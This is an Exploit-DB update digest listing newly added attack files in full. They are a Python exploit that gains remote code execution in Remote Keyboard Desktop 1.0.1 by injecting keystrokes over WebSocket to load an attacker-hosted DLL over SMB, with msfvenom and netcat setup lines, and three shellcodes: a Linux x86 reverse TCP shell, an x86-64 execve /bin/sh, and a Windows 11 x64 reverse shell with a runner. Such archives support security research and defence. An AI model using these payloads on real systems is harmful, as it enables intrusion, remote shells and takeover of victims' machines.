DB: 2025-05-22

6 changes to exploits/shellcodes/ghdb

Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)

Linux/x86 - Reverse TCP Shellcode (95 bytes)

Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)

Windows 11 x64 - Reverse TCP Shellcode (564 bytes)

exploits/windows/remote/52299.py

@@ -0,0 +1,132 @@
+# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
+# Date: 05/17/2025
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://remotecontrolio.web.app/
+# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
+# Version: 1.0.1
+# Tested on: Windows 10 Pro Build 19045
+
+# Start Remote Keyboard Desktop on your windows
+# Preparing:
+#
+# 1. Generating payload (dll/exe):
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
+# 2. Start smb server: impacket-smbserver SHARE . -smb2support
+# 3. nc -lnvp 8080
+# 4. python exploit.py
+#####
+
+#!/usr/bin/env python3
+
+import websocket
+import json
+import time
+
+target = "192.168.8.105"
+lhost = "192.168.8.101"
+WS_URL = f"ws://{target}:8080/"
+payload = "shell2.dll" # payload dll/exe filename
+debug = False
+
+HEADER_LIST = [
+    "User-Agent: Dart/3.7 (dart:io)",
+    f"Origin: http://{target}:8080",
+    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
+]
+
+#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
+
+SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
+based
+
+special_mapping = {
+    ' ': ("SPACE", False),
+    '/': ("NUMPAD_DIVIDE", False),
+    '\\': ("\\", False),
+    '.': ("NUMPAD_DECIMAL", False),
+    ',': (",", False),
+}
+
+def send_key_event(ws, key, key_down):
+    event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
+key_down, "capsLock": False}}
+    ws.send(json.dumps(event))
+
+def send_text(ws, text, delay=0.05):
+    shift_pressed = False
+    for ch in text:
+        if ch in special_mapping:
+            key_name, need_shift = special_mapping[ch]
+        elif ch.isalpha():
+            need_shift = ch.isupper()
+            key_name = ch.upper()
+        elif ch.isdigit():
+            key_name = ch
+            need_shift = False
+        else:
+            raise ValueError(f"No key mapping for character: {ch!r}")
+
+        if need_shift and not shift_pressed:
+            send_key_event(ws, "SHIFT", True)
+            shift_pressed = True
+        elif not need_shift and shift_pressed:
+            send_key_event(ws, "SHIFT", False)
+            shift_pressed = False
+
+        send_key_event(ws, key_name, True)
+        send_key_event(ws, key_name, False)
+        time.sleep(delay)
+
+    if shift_pressed:
+        send_key_event(ws, "SHIFT", False)
+
+def send_key(ws, keys, delay=0.05):
+    for key in keys:
+        send_key_event(ws, key, True)
+    time.sleep(delay)
+    for key in reversed(keys):
+        send_key_event(ws, key, False)
+
+def on_open(ws):
+    print ("Let's start!")
+
+    send_key(ws, ["LEFT_WINDOWS", "R"])
+    time.sleep(0.5)
+
+    send_text(ws, SMB_PATH)
+    send_key(ws, ["RETURN"])
+    print ("Executing...")
+    time.sleep(1.2)
+
+    print("Check your listener!")
+    if debug:
+
+            print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
+")
+
+    ws.close()
+
+def on_message(ws, message):
+    if debug:
+        print("[=] Received:", message)
+
+def on_error(ws, error):
+    if debug:
+        print("[!] Error:", error)
+
+def on_close(ws, code, reason):
+    if debug:
+        print(f"[x] Closed: {code} - {reason}")
+
+if __name__ == "__main__":
+    websocket.enableTrace(debug)
+    ws = websocket.WebSocketApp(
+        WS_URL,
+        header=HEADER_LIST,
+        on_open=on_open,
+        on_message=on_message,
+        on_error=on_error,
+        on_close=on_close
+    )
+
+    ws.run_forever()

files_exploits.csv

@@ -45357,6 +45357,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip,
 39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip,
 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,,
+52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,,
 46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe,
 1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,,
 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,,

files_shellcodes.csv

@@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php
 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php
+52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,,
 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,,
 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php
@@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh)  + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
+52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,,
 51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
@@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
+52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,,
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,

shellcodes/linux_x86-64/52296.asm

@@ -0,0 +1,31 @@
+# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
+# Date: 2025-03-23
+# Exploit Author: Sayan Ray [@barebones90]
+# Tested on: Linux x86-64
+# CVE: N/A
+
+; P0P SH311 execve ("/bin/sh", NULL, NULL)
+
+GLOBAL _start
+
+section .text
+
+_start:
+    xor rax, rax
+    push rax
+
+    mov r10, 0x68732f6e69622f ; hs/nib/
+    push r10
+
+    mov rdi, rsp  ; rdi points to the string "/bin/sh" from the stack
+                  ; ( const char *pathname )
+
+    ; Calling execve
+    mov rax, 0x3b ; 59 [execve syscall]
+    mov rsi, 0    ; NULL ( char *const _Nullable argv[] )
+    mov rdx, 0    ; NULL ( char *const _Nullable envp[] )
+    syscall
+
+; Shellcode:
+; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
+; [Length] : 36

shellcodes/linux_x86/52297.c

@@ -0,0 +1,43 @@
+/*
+# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
+# Date: 2025-04-06
+# Exploit Author: Al Baradi Joy
+# Platform: Linux x86
+# Type: Shellcode
+# Shellcode Length: 95 bytes
+# Tested On: Kali Linux x86
+# Connect-Back IP: 192.168.1.100
+# Connect-Back Port: 4444
+
+Description:
+This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
+
+Usage:
+Start a netcat listener on your attacking machine:
+    nc -lvnp 4444
+
+Compile and run on the target machine:
+    gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+    ./shellcode
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] =
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"      // zero out registers
+"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66"  // socket syscall
+"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64"  // push IP: 192.168.1.100
+"\x66\x68\x11\x5c"                      // push port 4444
+"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
+"\x89\xe1\xb0\x66\xb3\x03\xcd\x80"      // connect
+"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f"      // dup2 loop
+"\xcd\x80\x49\x79\xf9"
+"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
+"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80";     // execve("/bin/sh")
+
+int main() {
+    printf("Shellcode Length: %zu\n", strlen(shellcode));
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}

shellcodes/windows_x86-64/52298.py

@@ -0,0 +1,335 @@
+#!/usr/bin/python
+#
+# Description: Windows 11 x64 Reverse TCP Shell
+# Architecture: x64
+# OS: Microsoft Windows
+# Author: hvictor (Victor Huerlimann)
+# Shellcode Size: 564 bytes
+# Repository:https://github.com/hvictor/shellcode-x64
+#
+# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle
+#
+# Note: You will have to modify the line 193 of this file according to the attacker's IP and port:
+# mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
+# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family.
+
+import ctypes, struct
+from ctypes import wintypes
+
+from keystone import *
+CODE = (
+'''
+start:
+    mov rbp, rsp
+    sub rsp, 1600
+
+resolve_kernel32:
+    mov dl, 0x4b                        # dl = 'K'
+    mov rcx, 0x60                       #
+    mov r8, gs:[rcx]                    # R8 = address of PEB
+    mov rdi, [r8 + 0x18]                # RDI = address of _PEB_LDR_DATA
+    mov rdi, [rdi + 0x30]               # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY)
+search:
+    xor rcx, rcx
+    mov rbx, [rdi + 0x10]               # RBX = DllBase
+    mov rsi, [rdi + 0x40]               # RSI = address of UNICODE string BaseDllName.Buffer
+    mov rdi, [rdi]                      # RDI = address of the next _LIST_ENTRY
+    cmp [rsi + 0x18], cx                # Compare the 24-th UNICODE char with NULL
+    jne search                          # If length of BaseDllName is not 12 UNICODE chars, continue searching
+    cmp [rsi], dl                       # Compare the first UNICODE char with 'K'
+    jne search                          # If the first UNICODE char is not 'K', continue searching
+
+find_function_jmp:
+    jmp callback                        # Jump to callback to make a negative (null byte free) call to get_find_function_addr
+
+get_find_function_addr:
+    pop rsi                             # The address of find_function is popped in RSI
+    mov [rbp + 0x8], rsi                # The address of find_function is stored at (RBP + 8)
+    jmp resolve_k32_sym                 # Once the address of find_function has been stored, proceed with the resolution of kernel32 symbols
+
+callback:
+    call get_find_function_addr         # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack
+                                        # This is the address of find_function, and it will be popped in ESI (see get_find_function_addr).
+
+find_function:
+
+# Current Stack Layout:
+#---------------------------------------------------------------------------
+# QWORD: Return Address (addr of instruction after "call find_function", see below)
+# QWORD: Number of hash bytes + 8           <- RSP
+# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
+# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
+# ...
+# QWORD: 0x0000000000000000
+#---------------------------------------------------------------------------
+
+    add rsp, 8                          # Point RSP to (Number of hash bytes + 8)
+    pop rax                             # RAX = Number of hash bytes + 8
+    push -1                             # Write -1 on the stack instead of (Number of hash bytes + 8)
+    add rsp, rax                        # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000
+
+# Current Stack Layout:
+#---------------------------------------------------------------------------
+# QWORD: Return Address
+# QWORD: 0xffffffffffffffff
+# QWORD: <0x00000000> <Hash of CreateProcessA (4 bytes)>
+# QWORD: <0x00000000> <Hash of LoadLibraryA (4 bytes)>
+# ...
+# QWORD: 0x0000000000000000                <- RSP
+#---------------------------------------------------------------------------
+
+find_function_loop2:
+    xor rax, rax
+    xor rdi, rdi
+    mov eax, [rbx + 0x3c]               # EAX = offset to the PE Header of the module = e_lfanew
+    mov edi, [rbx + rax + 0x88]         # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress)
+    add rdi, rbx                        # RDI = VMA of the Export Directory Table of the module
+    mov ecx, [rdi + 24]                 # ECX = NumberOfNames (field of the Export Directory Table of the module)
+    mov eax, [rdi + 32]                 # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table)
+    add rax, rbx                        # EAX = VMA of AddressOfNames
+    mov [rbp - 8], rax                  # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else
+
+find_function_loop:
+    dec ecx                             # Initially, ECX = NumberOfNames: decrement to get the index of the last name
+    mov rax, [rbp - 8]                  # EAX = VMA of AddressOfNames
+    mov esi, [rax + rcx * 4]            # ESI = RVA of the current Symbol Name
+    add rsi, rbx                        # RSI = VMA of the current Symbol Name
+
+compute_hash:
+    xor rax, rax                        # EAX = 0
+    cdq                                 # If the MSB of EAX = 1: EDX = 0x11111111
+                                        # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX
+                                        # In this case, EDX = 0x00000000 because EAX = 0x00000000
+
+compute_hash_repeat:
+    ror edx, 0xd                        # Right-shift EDX of 13 bits
+    add edx, eax                        # EDX += current EAX value
+    lodsb                               # Load the byte pointed by ESI into AL
+    test al, al                         # Test if the NULL terminator of the Symbol Name has been reached
+    jnz compute_hash_repeat             # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison
+                                        # Else, perform the next iteration of the hash-computation algorithm
+                                        # At this point, EDX contains the computed hash of the current symbol
+
+find_function_compare:
+    cmp edx, [rsp - 8]                  # Compare the computed hash with the hash of the wanted symbol
+    jnz find_function_loop              # If ZF = 0, the hash is different: proceed with the next name from AddressOfNames
+                                        # If ZF = 1, the hash is equal: symbol found: continue hereby
+    mov edx, [rdi + 36]                 # EDX = RVA of the AddressOfNameOrdinals array
+    add rdx, rbx                        # RDX = VMA of the AddressOfNameOrdinals array
+    mov cx, [rdx + 2 * rcx]             # CX = Symbol's Ordinal (lower 16 bits of ECX)
+    mov edx, [rdi + 28]                 # EDX = RVA of the AddressOfFunctions array
+    add rdx, rbx                        # RDX = VMA of the AddressOfFunctions array
+    mov eax, [rdx + 4 * rcx]            # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol
+    add rax, rbx                        # EAX = VMA of the wanted symbol
+    push rax                            # Push the wanted symbol's VMA onto the stack:
+                                        # ATTENTION: The symbol's VMA overwrites its Hash on the stack!
+    mov rax, [rsp - 8]
+    cmp rax, -1                         # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved
+    jnz find_function_loop2             # Until all wanted symbols have been resolved, continue looping
+
+find_function_finish:                   # When we get here, all wanted symbols have been resolved: their VMAs are on the stack
+    sub rsp, 16                         # Point RSP to the Return Address of find_function
+    ret                                 # Return
+
+resolve_k32_sym:
+    mov rax, 0x00000000ec0e4e8e         # Hash of LoadLibraryA
+    push rax
+    mov rax, 0x0000000016b3fe72         # Hash of CreateProcessA
+    push rax
+    mov rax, 0x0000000078b5b983         # Hash of TerminateProcess
+    push rax
+    mov rax, 32                         # Push 32 onto the stack
+    push rax
+    call [rbp + 8]                      # Call to find_function (see find_function above)
+
+load_ws2_32:
+    mov rax, 0x0000000000006C6C         # 'll x00 x00 x00 x00 x00 x00' (reversed)
+    push rax
+    mov rax, 0x642E32335F327377         # 'ws2_32.d' (reversed)
+    push rax
+    mov rcx, rsp                        # Paramter 1 = address of "ws2_32.dll"
+    sub rsp, 40                         # Create 40 bytes of room on the stack
+    call [rsp + 80]                     # Call LoadLibraryA
+    nop
+
+resolve_ws2_sym:
+    mov rbx, rax                        # RBX = Base Address of ws2_32.dll
+    mov rax, 0x0000000060aaf9ec         # Hash of connect
+    push rax
+    mov rax, 0x00000000adf509d9         # Hash of WSASocketA
+    push rax
+    mov rax, 0x000000003bfcedcb         # Hash of WSAStartup
+    push rax
+    mov rax, 32
+    push rax                            # Push 32 (Number of Hashes pushed + 8)
+    call [rbp + 8]                      # Call find_function
+
+    sub rsp, 512
+
+call_WSAStartup:
+    mov rcx, 0x202                      # RCX = WinSock Version 2.2
+    lea rdx, [rsp + 800]                # RDX = Address of output WSAData structure
+    call [rsp + 520]                    # Call WSAStartup
+
+call_WSASocketA:
+    mov rcx, 2                          # Parameter af = 2 (AF_INET)
+    mov rdx, 1                          # Parameter type = 1
+    mov r8, 6                           # Parameter protocol = 6 (TCP)
+    xor r9, r9                          # Parameter lpProtocolInfo = 0
+    mov [rsp + 32], r9                  # Parameter dwFlags = 0
+    mov [rsp + 40], r9                  # Parameter g = 0
+    call [rsp + 528]                    # Call WSASocketA
+
+
+call_connect:
+    mov rsi, rax                        # Save socket fd in RSI
+    mov rcx, rax                        # RCX = Parameter s = socket fd created with WSSocketA
+    mov r8, 16                          # R8 = Parameter namelen = 16
+
+    # Preparation of the sockaddr_in structure on the stack:
+    # struct sockaddr_in {
+    #   QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)]
+    #   QWORD: sin_zero = [00000000 00000000]
+    # }
+    mov r9, 0x7901A8C029230002          # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2]
+    lea rdx, [rsp + 800]                # RDX = Parameter name = Address of struct sockaddr_in
+    mov [rdx], r9                       # Write fields: sin_addr, sin_port, sin_family
+    xor r9, r9
+    mov [rdx + 8], r9                   # Write field sin_zero
+    call [rsp + 536]                    # Call connect
+
+# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation:
+# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
+create_STARTUPINFOA:
+    lea rdi, [rsp + 800]
+    add rdi, 0x300
+    mov rbx, rdi
+    xor eax, eax
+    mov ecx, 0x20
+    rep stosd                           # Zero-out 0x80 bytes
+    mov eax, 0x68                       # EAX = sizeof(_STARTUPINFO) = 0x68
+    mov [rbx], eax                      # Field lpStartInfo.cb = sizeof(_STARTUPINFO)
+    mov eax, 0x100                      # EAX = STARTF_USESTDHANDLES
+    mov [rbx + 0x3c], eax               # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES
+    mov [rbx + 0x50], rsi               # Field lpStartupInfo.hStdInput = socket fd
+    mov [rbx + 0x58], rsi               # Field lpStartupInfo.hStdOutput = socket fd
+    mov [rbx + 0x60], rsi               # Field lpStartupInfo.hStdError = socket fd
+
+# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation:
+# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py
+call_CreateProccessA:
+    xor rax, rax
+    xor rcx, rcx                        # Parameter lpApplicationName = 0
+    lea rdx, [rsp + 800]                # Parameter lpCommandLine
+    add rdx, 0x180
+    mov eax, 0x646d63                   # EAX = "cmd"
+    mov [rdx], rax                      # Write "cmd" in the lpCommandLine parameter
+    xor r8, r8                          # Parameter lpProcessAttributes = 0
+    xor r9, r9                          # Parameter lpThreadAttributes = 0
+    xor rax, rax
+    inc eax
+    mov [rsp + 0x20], rax               # Parameter bInheritHandles = 1
+    dec eax
+    mov [rsp + 0x28], rax               # Parameter dwCreationFlags = 0
+    mov [rsp + 0x30], rax               # Parameter lpEnvironment = 0
+    mov [rsp + 0x38], rax               # Parameter lpCurrentDirectory = 0
+    mov [rsp + 0x40], rbx               # Parameter lpStartupInfo = address of _STARTUPINFO
+    add rbx, 0x68
+    mov [rsp + 0x48], rbx               # Parameter lpProcessInformation = output address, right after _STARTUPINFO
+    call [rsp + 616]
+
+call_TerminateProcess:
+    xor rcx, rcx
+    dec rcx                             # Parameter hProcess = -1 = this process
+    xor rdx, rdx                        # Parameter uExitCode = 0 (graceful termination)
+    int3
+    call [rsp + 608]                    # Call TerminateProcess
+'''
+)
+
+
+# Initialize engine in 64-bit mode
+ks = Ks(KS_ARCH_X86, KS_MODE_64)
+encoding, count = ks.asm(CODE)
+instructions = ""
+for dec in encoding:
+ instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n")
+
+print("Opcodes = (\"" + instructions + "\")")
+print(f"Size: {len(encoding)} bytes.")
+
+# E
+
+# Preparation of WSAStartup (not included in the shellcode)
+# Define necessary structures and constants
+class WSADATA(ctypes.Structure):
+    _fields_ = [
+        ("wVersion", wintypes.WORD),
+        ("wHighVersion", wintypes.WORD),
+        ("szDescription", wintypes.CHAR * 257),
+        ("szSystemStatus", wintypes.CHAR * 129),
+        ("iMaxSockets", wintypes.UINT),
+        ("iMaxUdpDg", wintypes.UINT),
+        ("lpVendorInfo", ctypes.POINTER(ctypes.c_char))
+    ]
+
+# Load the Winsock library
+ws2_32 = ctypes.windll.ws2_32
+
+# Define the WSAStartup function prototype
+# WSAStartup takes two arguments:
+# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2)
+# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation
+ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)]
+ws2_32.WSAStartup.restype = wintypes.INT
+
+def call_wsastartup():
+    # Request version 2.2 (0x0202)
+    version_requested = 0x0202
+
+    # Create an instance of WSADATA to hold the output
+    wsadata = WSADATA()
+
+    # Call WSAStartup
+    result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata))
+
+    if result != 0:
+        raise RuntimeError(f"WSAStartup failed with error code {result}")
+
+    print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}")
+    return wsadata
+
+call_wsastartup()
+
+sh = b""
+for e in encoding:
+    sh += struct.pack("B", e)
+shellcode = bytearray(sh)
+
+# Alloco memoria eseguibile per lo shellcode
+ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000,
+                                          ctypes.c_int(len(shellcode)),
+                                          ctypes.c_int(0x3000),
+                                          ctypes.c_int(0x40))
+
+# Metto lo shellcode nel buffer `buf`
+buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
+
+# Copio lo shellcode nella memoria allocata
+ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
+                                     buf,
+                                     ctypes.c_int(len(shellcode)))
+
+print("Shellcode: Short Reverse Shell")
+print("Shellcode address = %s" % hex(ptr))
+input("\n[?] Press Enter to execute the shellcode: ")
+
+# Eseguo lo shellcode in un nuovo thread, su cui faccio la join
+ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(ptr),
+                                         ctypes.c_int(0),
+                                         ctypes.c_int(0),
+                                         ctypes.pointer(ctypes.c_int(0)))
+
+ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))